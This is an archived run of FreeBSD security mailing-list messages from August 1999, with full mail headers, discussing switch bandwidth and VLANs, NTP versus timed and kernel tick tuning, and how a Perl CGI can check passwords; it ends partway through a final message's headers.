From owner-freebsd-security Sun Aug 22 0:15:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id B7D2E14D62 for ; Sun, 22 Aug 1999 00:15:39 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id AAA76633; Sun, 22 Aug 1999 00:13:25 -0700 (PDT) (envelope-from dillon) Date: Sun, 22 Aug 1999 00:13:25 -0700 (PDT) From: Matthew Dillon Message-Id: <199908220713.AAA76633@apollo.backplane.com> To: "Rodney W. Grimes" Cc: cdillon@wolves.k12.mo.us (Chris Dillon), wes@softweyr.com (Wes Peters), cliff@steam.com (Cliff Skolnick), service_account@yahoo.com (jay d), yurtesen@ispro.net.tr (Evren Yurtesen), freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network References: <199908220649.XAA31700@gndrsh.dnsmgr.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> I noticed the only "L3 support" from the spec sheets of the 4000M and :> 8000M is IGMP snooping to control multicast traffic, and "protocol :> filtering" only on the 8000M. Nothing close to IP routing, however :... :> with only a 3.8Gbit backplane, unless local switching occurs on each :> of the port modules, and even then the "throughput test" would have to :... : :... :4Gbit/sec of backplane to do this. Thats 4G bytes of data in, 4G :accross the backplane, and 4G back out of the box. : :... :As you can see the Fabric only has to handle 40 x 100Mb/s to :keep all 40 ports busy at full duplex. : :The 3.8 Gb/s spec comes up a little short, but only buy 2 ports... :and it had better be darned efficent as far as overhead goes... :-- :Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net One thing I've learned about switches: By the time you actually use up the backplane bandwidth of a cheapish switch you are already spending so much money on the hardware connected to the thing that the cost of upgrading the switch itself is in the noise. The second thing I've learned: Unless your needs are highly specialized, you aren't going to even come close to the potential aggregate bandwidth of N ports. At BEST we had several catalysts - 150+ ports on each one, for customer colo and for all of our web servers & shell machines. I don't think any of those babies ever used more then 500 MBits of aggregate bandwidth across the fabric. In regards to all the discussions about security and so forth... well, all I can say to that is that it's easy for one to get worked up into a frenzy over network security. You have much less stress when you simply assume that the network is always compromised. Then you can concentrate your time securing the machines and using only encrypted network links, which is what you should have been doing in the first place. Any hacker who can bypass a simple switch also has a fairly good chance of working around a more sophisticated one, even if you nail the MAC addresses down and take every precaution you can think of. To my mind that means that it makes sense to take basic precautions (e.g. use a switch instead of a hub), but if you get too far beyond that you start to waste money on tiny incremental improvements. Some people might get some peace of mind by throwing lots of money into hardware, but it gives a false sense of security. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 0:38:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 5DBD514D26 for ; Sun, 22 Aug 1999 00:38:40 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id RAA28514; Sun, 22 Aug 1999 17:38:28 +1000 Date: Sun, 22 Aug 1999 17:38:28 +1000 From: Bruce Evans Message-Id: <199908220738.RAA28514@godzilla.zeta.org.au> To: ben@scientia.demon.co.uk, gjb-freebsd@gba.oz.au Subject: Re: Securelevel 3 ant setting time Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> If you happen to have a machine that needs its regular tweaks by >> ntpdate to exceed half a second, then you can adjust the kernel >> tick a few units either side of its default setting of 10000 so >> that things stay relatively stable. > >Where should I change this? I tried changing the value in You shouldn't. The kernel variable `tick' is not used for timekeeping in FreeBSD. It is only used for determining select timeouts and related low precision things. >/sys/conf/param.c (after copying it to the compile directory) and >it seems to have had no effect. I changed it to 9997, I calculated Change the frequency of active timecounter to closer to its actual frequency using `sysctl -w ...'. The hardware timecounters and their frequencies can be found using `sysctl -a | grep _freq'. The currently active timecounter can be found and changed in -current only using `sysctl [-w] kern.timecounter.hardware'. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 4: 7:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from loso.dyndns.com (dialup35-224.samart.co.th [203.149.35.224]) by hub.freebsd.org (Postfix) with ESMTP id 5C42514BFE for ; Sun, 22 Aug 1999 04:07:05 -0700 (PDT) (envelope-from freebsd@loso.dyndns.com) Received: from loso.dyndns.com (IDENT:root@anakin.soi6.net.th [192.168.1.2]) by loso.dyndns.com (8.9.3/8.9.3) with ESMTP id NAA01253 for ; Sun, 22 Aug 1999 13:48:47 +0700 Message-ID: <37BF9D25.539C689F@loso.dyndns.com> Date: Sun, 22 Aug 1999 13:48:05 +0700 From: Note X-Mailer: Mozilla 4.61 [en] (X11; I; Linux 2.2.11 i586) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org which To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 4:44: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from maxim.gba.oz.au (gba.tmx.com.au [203.9.155.249]) by hub.freebsd.org (Postfix) with SMTP id 4F31C14D46 for ; Sun, 22 Aug 1999 04:43:46 -0700 (PDT) (envelope-from gjb-freebsd@gba.oz.au) Received: (qmail 23419 invoked from network); 22 Aug 1999 18:09:10 +1000 Received: from alice.gba.oz.au (192.168.1.11) by maxim.gba.oz.au with SMTP; 22 Aug 1999 18:09:10 +1000 Received: (qmail 6390 invoked by uid 1001); 22 Aug 1999 18:09:09 +1000 Message-ID: <19990822080909.6389.qmail@alice.gba.oz.au> X-Posted-By: GBA-Post 1.03 20-Sep-1998 X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30 Date: Sun, 22 Aug 1999 18:09:09 +1000 From: Greg Black To: Poul-Henning Kamp Cc: Will Andrews , Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time References: <6639.935186801@critter.freebsd.dk> In-reply-to: <6639.935186801@critter.freebsd.dk> of Sat, 21 Aug 1999 00:06:41 +0200 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poul-Henning Kamp writes: > >Just as a bit of extra information, xntpd is useless for small > >networks that don't have constant connectivity to time servers. > > Not any longer with ntpv4... FreeBSD-3.2-release comes with version 3 which makes this not entirely useful. Will version 4 be part of the 3.3 release? -- Greg Black -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 4:44:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from maxim.gba.oz.au (gba.tmx.com.au [203.9.155.249]) by hub.freebsd.org (Postfix) with SMTP id 4ED5614D1A for ; Sun, 22 Aug 1999 04:43:46 -0700 (PDT) (envelope-from gjb-freebsd@gba.oz.au) Received: (qmail 23440 invoked from network); 22 Aug 1999 18:23:17 +1000 Received: from alice.gba.oz.au (192.168.1.11) by maxim.gba.oz.au with SMTP; 22 Aug 1999 18:23:17 +1000 Received: (qmail 6457 invoked by uid 1001); 22 Aug 1999 18:23:16 +1000 Message-ID: <19990822082316.6456.qmail@alice.gba.oz.au> X-Posted-By: GBA-Post 1.03 20-Sep-1998 X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30 Date: Sun, 22 Aug 1999 18:23:15 +1000 From: Greg Black To: sthaug@nethelp.no Cc: andrews@TECHNOLOGIST.COM, brett@lariat.org, freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time References: <19990820214657.1605.qmail@alice.gba.oz.au> <50744.935188518@verdi.nethelp.no> In-reply-to: <50744.935188518@verdi.nethelp.no> of Sat, 21 Aug 1999 00:35:18 +0200 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org sthaug@nethelp.no writes: > > It may be worth noting that timed is much smaller and uses much > > less CPU than xntpd. > > That's probably true - but on today's systems it's also for the most > part completely irrelevant. No it's not irrelevant. FreeBSD proclaims that it can run happily on old slow hardware. It can. But not by wasting resources for long-running daemons. And, no matter how fast your hardware, it is still desirable that programs that run from boot to shutdown not waste memory or CPU. It doesn't really matter on a modern system if gcc is a pig since it's used in a transient manner. But it does matter if the daemons are pigs. > On a P-166 here an xntpd process which has > been running for 27 days has used all of 255 CPU seconds (ie. something > like 0.01%). It has a RSS of 476 kByte. I re-started all my timed processes 135 hours ago because of a change in network topology. Since then, the FreeBSD versions have used less than half a second of CPU which is more than 100 times less than you show for xntpd. And on the old 486-33 which is the server, the CPU has only clocked up a few seconds. -- Greg Black -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 4:44:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from maxim.gba.oz.au (gba.tmx.com.au [203.9.155.249]) by hub.freebsd.org (Postfix) with SMTP id 601B815549 for ; Sun, 22 Aug 1999 04:43:51 -0700 (PDT) (envelope-from gjb-freebsd@gba.oz.au) Received: (qmail 23585 invoked from network); 22 Aug 1999 21:29:23 +1000 Received: from alice.gba.oz.au (192.168.1.11) by maxim.gba.oz.au with SMTP; 22 Aug 1999 21:29:23 +1000 Received: (qmail 6667 invoked by uid 1001); 22 Aug 1999 21:29:23 +1000 Message-ID: <19990822112923.6666.qmail@alice.gba.oz.au> X-Posted-By: GBA-Post 1.03 20-Sep-1998 X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30 Date: Sun, 22 Aug 1999 21:29:22 +1000 From: Greg Black To: Jon Hamilton Cc: Will Andrews , Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time References: <19990821031948.09B2B1D@woodstock.monkey.net> In-reply-to: <19990821031948.09B2B1D@woodstock.monkey.net> of Fri, 20 Aug 1999 22:19:48 EST Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jon Hamilton writes: > } Just as a bit of extra information, xntpd is useless for small > } networks that don't have constant connectivity to time servers. > > Absolutely untrue. There's value in keeping a group of machines > synchronized to _each other_, regardless of whether they're also > synchronized to the correct time. It may well be useful to *some* people to maintain a bunch of machines with the wrong time, but it's utterly useless to me and, I'm certain, to lots of other people. > It is true that _for some purposes_ > xntpd isn't all that useful in an intermittently-connected scenario, And one of those purposes would be keeping the clocks on the machines close to the correct time, something that should be (and is) easy to do with the appropriate tools. > but that doesn't render it completely devoid of any value. I could say that the QIC-150 tape drive in my gateway machine is useful because it fills in the gaping hole that would otherwise disfigure the front of the machine's case, but the fact that it doesn't perform what I consider to be its primary function (that of writing data onto tapes) makes it useless in my terms. The same goes for xntpd in the scenario that I mentioned. -- Greg Black -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 4:44:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from maxim.gba.oz.au (gba.tmx.com.au [203.9.155.249]) by hub.freebsd.org (Postfix) with SMTP id E3AC015553 for ; Sun, 22 Aug 1999 04:43:51 -0700 (PDT) (envelope-from gjb-freebsd@gba.oz.au) Received: (qmail 23604 invoked from network); 22 Aug 1999 21:41:16 +1000 Received: from alice.gba.oz.au (192.168.1.11) by maxim.gba.oz.au with SMTP; 22 Aug 1999 21:41:16 +1000 Received: (qmail 6731 invoked by uid 1001); 22 Aug 1999 21:41:15 +1000 Message-ID: <19990822114115.6730.qmail@alice.gba.oz.au> X-Posted-By: GBA-Post 1.03 20-Sep-1998 X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30 Date: Sun, 22 Aug 1999 21:41:14 +1000 From: Greg Black To: Ben Smithurst Cc: freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time References: <19990820214657.1605.qmail@alice.gba.oz.au> <19990821171004.A24337@lithium.scientia.demon.co.uk> In-reply-to: <19990821171004.A24337@lithium.scientia.demon.co.uk> of Sat, 21 Aug 1999 17:10:04 +0100 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ben Smithurst writes: > > If you happen to have a machine that needs its regular tweaks by > > ntpdate to exceed half a second, then you can adjust the kernel > > tick a few units either side of its default setting of 10000 so > > that things stay relatively stable. > > Where should I change this? I tried changing the value in > /sys/conf/param.c (after copying it to the compile directory) and > it seems to have had no effect. I changed it to 9997, I calculated > this as the best value given that my machine's clock seems to gain > about 1 second per hour. The clock still seems to be running fast, > according to the adjustments made by ntpdate. The new value shows up in > kern.clockrate so I must have got something right. > > root@scientia:/sys/compile/SCIENTIA# sysctl kern.clockrate > kern.clockrate: { hz = 100, tick = 9997, tickadj = 5, profhz = 1024, stathz = 128 } The way I would do this is to stop ntpdate (and any other time adjusting things) from operating while I was playing with the tick value. Then just run the machine for 24 hours and see how far it drifts. Make an adjustment to tick and go for another 24 hours. Keep going until it stays within half a second of the right time. Then go back to regular corrections with ntpdate and all will be well. I haven't ever done this on a FreeBSD machine. The only machine that I use as a time server that needed tweaking was an old 486 running BSD/OS. BSDI provide a tickadj program with the ntp tools which can adjust the tick value on a running kernel, and I have a call to it in the /etc/rc on that machine. But it seems to tweak the same thing as you have found. Here's its sysctl output: kern.clockrate: hz = 100, tick = 9997, profhz = 100, stathz = 100 That machine only gets to run ntpdate once a day and it rarely requires an adjustment of greater than 300 ms and never greater than 500 ms. -- Greg Black -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 4:48:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 50C4814D13 for ; Sun, 22 Aug 1999 04:48:17 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id NAA03245; Sun, 22 Aug 1999 13:46:06 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Greg Black Cc: Will Andrews , Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time In-reply-to: Your message of "Sun, 22 Aug 1999 18:09:09 +1000." <19990822080909.6389.qmail@alice.gba.oz.au> Date: Sun, 22 Aug 1999 13:46:05 +0200 Message-ID: <3243.935322365@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990822080909.6389.qmail@alice.gba.oz.au>, Greg Black writes: >Poul-Henning Kamp writes: > >> >Just as a bit of extra information, xntpd is useless for small >> >networks that don't have constant connectivity to time servers. >> >> Not any longer with ntpv4... > >FreeBSD-3.2-release comes with version 3 which makes this not >entirely useful. Will version 4 be part of the 3.3 release? no. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 8:57:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from spork.cs.unm.edu (spork.cs.unm.edu [198.59.151.21]) by hub.freebsd.org (Postfix) with ESMTP id 1D3E214CE7 for ; Sun, 22 Aug 1999 08:57:39 -0700 (PDT) (envelope-from colinj@cs.unm.edu) Received: from portico.cs.unm.edu ([198.59.151.19]) by spork.cs.unm.edu with esmtp (Exim 2.12 #3) id 11IZzw-0003Ux-00 for freebsd-security@freebsd.org; Sun, 22 Aug 1999 09:57:32 -0600 Received: from colinj by portico.cs.unm.edu with local-esmtp (Exim 2.05 #1 (Debian)) id 11IZzv-0001Sv-00; Sun, 22 Aug 1999 09:57:31 -0600 Date: Sun, 22 Aug 1999 09:57:31 -0600 (MDT) From: Colin Eric Johnson To: freebsd-security@freebsd.org Subject: getting passwored data via a perl cgi Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm in the process of writing a cgi script in perl that should verify people against the machines password file. The problem that I am running into is that if the script is run by anyone other then root I get an empty encrypted password field. I don't want to run the cgi SUID root as this doesn't seem safe. Is there a way to allow other users access to complete password database? I understand, basically, why this is restricted but I'm not sure how else to solve this given FreeBSDs restrictions. thanks Colin E. Johnson | colinj@unm.edu | http://www.unm.edu/~colinj/ Parker always felt things in his bones because, he said, it saved space. -Steven Ayelett, _The Crime Studio_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 11:36:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.wolves.k12.mo.us (mail.wolves.k12.mo.us [207.160.214.1]) by hub.freebsd.org (Postfix) with ESMTP id B474715569 for ; Sun, 22 Aug 1999 11:36:27 -0700 (PDT) (envelope-from cdillon@wolves.k12.mo.us) Received: from mail.wolves.k12.mo.us (cdillon@mail.wolves.k12.mo.us [207.160.214.1]) by mail.wolves.k12.mo.us (8.9.3/8.9.2) with ESMTP id NAA83097; Sun, 22 Aug 1999 13:36:02 -0500 (CDT) (envelope-from cdillon@wolves.k12.mo.us) Date: Sun, 22 Aug 1999 13:36:01 -0500 (CDT) From: Chris Dillon To: "Rodney W. Grimes" Cc: Wes Peters , Cliff Skolnick , jay d , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <199908220649.XAA31700@gndrsh.dnsmgr.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 21 Aug 1999, Rodney W. Grimes wrote: > > On Sat, 21 Aug 1999, Wes Peters wrote: > > > > > You obviously didn't follow the links. The HP ProCurve I mentioned is $1880 > > > for 40 switched 10/100 ports with layer 3 functionality and VLAN support. > > > That's $47 port port, much lower than your $250/port, with a LOT more performance > > > also. The Tolly Group recently tested it and found it capable of sustaining > > > full wire speed on all 40 ports. I'll just be your PCI-bus box isn't going > > > to hit 4 Gbps throughput. > > > > I noticed the only "L3 support" from the spec sheets of the 4000M and > > 8000M is IGMP snooping to control multicast traffic, and "protocol > > filtering" only on the 8000M. Nothing close to IP routing, however > > (not that you said it did, specifically, just clarifying). When the > > Tolly Group said they could "sustain full wire speed on all 40 ports", > > was that testing each one at a time or all at once? My math isn't > > quite warped enough to allow 40 100Mbit/FD ports to all be saturated > > with only a 3.8Gbit backplane, unless local switching occurs on each > > of the port modules, and even then the "throughput test" would have to > > take that into account and not try to move too much data across the > > backplane. > > Your making a common mistake here when an ``ALL PORTS FULL LOAD'' test > is done, if you have 40 ports all being sent data at 100MB/sec that > data is going to have to come out on 40 ports someplace, so you only need > 4Gbit/sec of backplane to do this. Thats 4G bytes of data in, 4G > accross the backplane, and 4G back out of the box. DOH. I knew better, I just didn't have my head screwed on straight. However, only half of the expansion slots are filled and already you are able to saturate the backplane. Add a couple of gigabit ports and it makes it much easier to do. > The 3.8 Gb/s spec comes up a little short, but only buy 2 ports... > and it had better be darned efficent as far as overhead goes... Only by 2 ports until you add even more ports. :-) Regardless, the switch still looks like an extremely good buy. -- Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net FreeBSD: The fastest and most stable server OS on the planet. For Intel x86 and Alpha architectures (SPARC under development). ( http://www.freebsd.org ) "One should admire Windows users. It takes a great deal of courage to trust Windows with your data." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 12:42:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from mailgw02.execpc.com (mailgw02.execpc.com [169.207.3.78]) by hub.freebsd.org (Postfix) with ESMTP id 1A3221558D for ; Sun, 22 Aug 1999 12:42:08 -0700 (PDT) (envelope-from hamilton@pobox.com) Received: from woodstock.monkey.net (harconia-2-87.mdm.mke.execpc.com [169.207.132.215]) by mailgw02.execpc.com (8.9.1) id OAA24253; Sun, 22 Aug 1999 14:41:10 -0500 Received: from pobox.com (localhost [127.0.0.1]) by woodstock.monkey.net (Postfix) with ESMTP id 623D211; Sun, 22 Aug 1999 14:41:40 -0500 (CDT) To: Greg Black Cc: Will Andrews , Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time In-reply-to: Your message of "Sun, 22 Aug 1999 21:29:22 +1000." <19990822112923.6666.qmail@alice.gba.oz.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 22 Aug 1999 14:41:40 -0500 From: Jon Hamilton Message-Id: <19990822194140.623D211@woodstock.monkey.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990822112923.6666.qmail@alice.gba.oz.au>, Greg Black wrote: } Jon Hamilton writes: } } > } Just as a bit of extra information, xntpd is useless for small } > } networks that don't have constant connectivity to time servers. } > } > Absolutely untrue. There's value in keeping a group of machines } > synchronized to _each other_, regardless of whether they're also } > synchronized to the correct time. } } It may well be useful to *some* people to maintain a bunch of } machines with the wrong time, but it's utterly useless to me } and, I'm certain, to lots of other people. Because it's useless to you does not make it useless in general. } > It is true that _for some purposes_ } > xntpd isn't all that useful in an intermittently-connected scenario, } } And one of those purposes would be keeping the clocks on the } machines close to the correct time, something that should be } (and is) easy to do with the appropriate tools. } } > but that doesn't render it completely devoid of any value. } } I could say that the QIC-150 tape drive in my gateway machine is } useful because it fills in the gaping hole that would otherwise } disfigure the front of the machine's case, but the fact that it } doesn't perform what I consider to be its primary function (that } of writing data onto tapes) makes it useless in my terms. The } same goes for xntpd in the scenario that I mentioned. But it doesn't; xntpd can still be used to keep your time accurate. Others have pointed out several possibilities, including: - keeping a local clock as a stratum (say) 8 reference, and synching to a lower stratum clock when available. - connecting to a local clock via serial port - some people don't care about "the" correct time, as long as their machines all agree about what they _think_ the time is (e.g. to keep NFS happy on an internal network) Just because you don't like xntpd or because you don't feel it fits your needs does not mean it's useless, it simply means that you think it's useless for your situation. Please stop pretending that the way your environment functions is the only way _anyone's_ environment functions. All the world's not your back yard. -- Jon Hamilton hamilton@pobox.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 13:56:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 578E61563B for ; Sun, 22 Aug 1999 13:56:31 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id WAA03181 for freebsd-security@FreeBSD.ORG; Sun, 22 Aug 1999 22:56:47 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id 0B9A2870A; Sun, 22 Aug 1999 22:34:15 +0200 (CEST) Date: Sun, 22 Aug 1999 22:34:15 +0200 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time Message-ID: <19990822223415.A11240@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <19990822080909.6389.qmail@alice.gba.oz.au> <3243.935322365@critter.freebsd.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.5i In-Reply-To: <3243.935322365@critter.freebsd.dk>; from Poul-Henning Kamp on Sun, Aug 22, 1999 at 01:46:05PM +0200 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5543 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Poul-Henning Kamp: > no. It is prefectly understandable when taking into account the time we have before the release but I'd like to see it in 4.0. Or, if we don't want to jump to ntpd, at least upgrade the ancient version we have... -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 13:56:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 5525F155C5 for ; Sun, 22 Aug 1999 13:56:37 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id WAA03182 for freebsd-security@freebsd.org; Sun, 22 Aug 1999 22:56:53 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id 1DF9B870A; Sun, 22 Aug 1999 22:36:19 +0200 (CEST) Date: Sun, 22 Aug 1999 22:36:19 +0200 From: Ollivier Robert To: freebsd-security@freebsd.org Subject: Re: getting passwored data via a perl cgi Message-ID: <19990822223619.B11240@keltia.freenix.fr> Mail-Followup-To: freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.5i In-Reply-To: ; from Colin Eric Johnson on Sun, Aug 22, 1999 at 09:57:31AM -0600 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5543 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Colin Eric Johnson: > Is there a way to allow other users access to complete password database? > I understand, basically, why this is restricted but I'm not sure how else > to solve this given FreeBSDs restrictions. Either you make it setuid root or you wipe up a daemon that runs as root and make your script discuss with the daemon. The daemon could cache entries for example (although pwd lookups should be fast thanks to the DB files). -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 14: 9:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from florence.pavilion.net (florence.pavilion.net [194.242.128.25]) by hub.freebsd.org (Postfix) with ESMTP id 97E2A15581 for ; Sun, 22 Aug 1999 14:09:27 -0700 (PDT) (envelope-from joe@florence.pavilion.net) Received: (from joe@localhost) by florence.pavilion.net (8.9.3/8.8.8) id WAA70914; Sun, 22 Aug 1999 22:08:32 +0100 (BST) (envelope-from joe) Date: Sun, 22 Aug 1999 22:08:32 +0100 From: Josef Karthauser To: Bigby Findrake Cc: jay d , "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network Message-ID: <19990822220832.A70149@pavilion.net> References: <19990820192825.15974.rocketmail@web601.yahoomail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: ; from Bigby Findrake on Fri, Aug 20, 1999 at 12:46:28PM -0700 X-NCC-RegID: uk.pavilion Organisation: Pavilion Internet plc, 24 The Old Steine, Brighton, BN1 1EL, England Phone: +44-845-333-5000 Fax: +44-845-333-5001 Mobile: +44-403-596893 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Aug 20, 1999 at 12:46:28PM -0700, Bigby Findrake wrote: > On Fri, 20 Aug 1999, jay d wrote: > > > What you really want is a VLAN capable switch. VLAN switches simply > > designate what ports on a switch can see what other ports on the same > > switch. I have to correct you though, Rodney, as sniffing is currently > > possible through switches. > > Please, do tell us how it's possible to sniff through switches. A switch only switches when it knows how where the destination mac addresses live. Most switches only have a fixed size table of mac addresses, so if you could somehow flood this table with bogus entries the switch would broadcast packets to destinations that it can't locate. The rest is an exercise for the reader, (although not on _my_ network please ;) Joe -- Josef Karthauser FreeBSD: How many times have you booted today? Technical Manager Viagra for your server (http://www.uk.freebsd.org) Pavilion Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 14:46:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id E092C15586 for ; Sun, 22 Aug 1999 14:46:04 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 8120E1C0E; Sun, 22 Aug 1999 16:47:24 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 7D4C13826; 